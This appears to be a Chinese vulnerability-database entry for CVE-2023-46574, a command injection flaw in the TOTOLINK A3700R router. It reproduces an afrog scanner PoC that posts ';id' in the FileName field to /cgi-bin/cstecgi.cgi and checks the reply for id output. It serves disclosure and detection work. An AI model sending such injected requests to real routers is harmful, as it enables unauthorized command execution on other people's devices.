CVE-2023-46574: TOTOLINK A3700R存在RCE漏洞

日期: 2025-09-01 | 影响软件: TOTOLINK A3700R | POC: 已公开

漏洞描述

TOTOLINK A3700R v9.1.2u.6165_20211012版本存在命令执行漏洞，攻击者可利用该漏洞通过UploadFirmwareFile函数的FileName参数执行任意代码。

PoC代码[已公开]

id: CVE-2023-46574

info:
  name: TOTOLINK A3700R存在RCE漏洞
  author: Y3y1ng
  severity: critical
  verified: false
  description: |-
    TOTOLINK A3700R v9.1.2u.6165_20211012版本存在命令执行漏洞，攻击者可利用该漏洞通过UploadFirmwareFile函数的FileName参数执行任意代码。
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-46574
    - https://github.com/OraclePi/repo/blob/main/totolink%20A3700R/1/A3700R%20%20V9.1.2u.6165_20211012%20vuln.md
  tags: TOTOLINK,RCE
  created: 2023/12/10

rules:
  r0:
    request:
      method: POST
      path: /cgi-bin/cstecgi.cgi
      body: |
        {
        "topicurl":"UploadFirmwareFile",
        "FileName":";id"
        }
    expression: 'response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)'
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2023/CVE-2023-46574.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2023-46574: TOTOLINK A3700R - Command Injection POC

PrestaShop /module/tshirtecommerce/designer SQL 注入漏洞（CVE-2023-27637） 无POC

PrestaShop SQL 注入漏洞（CVE-2023-46358） 无POC

PrestaShop /module/askforaquote/QuotesCart SQL 注入漏洞（CVE-2023-27843） 无POC

Fujitsu IP Series 权限绕过漏洞（CVE-2023-38433） 无POC

PrestaShop /module/tshirtecommerce/designer SQL 注入漏洞（CVE-2023-27637）无POC

PrestaShop SQL 注入漏洞（CVE-2023-46358）无POC

PrestaShop /module/askforaquote/QuotesCart SQL 注入漏洞（CVE-2023-27843）无POC

Fujitsu IP Series 权限绕过漏洞（CVE-2023-38433）无POC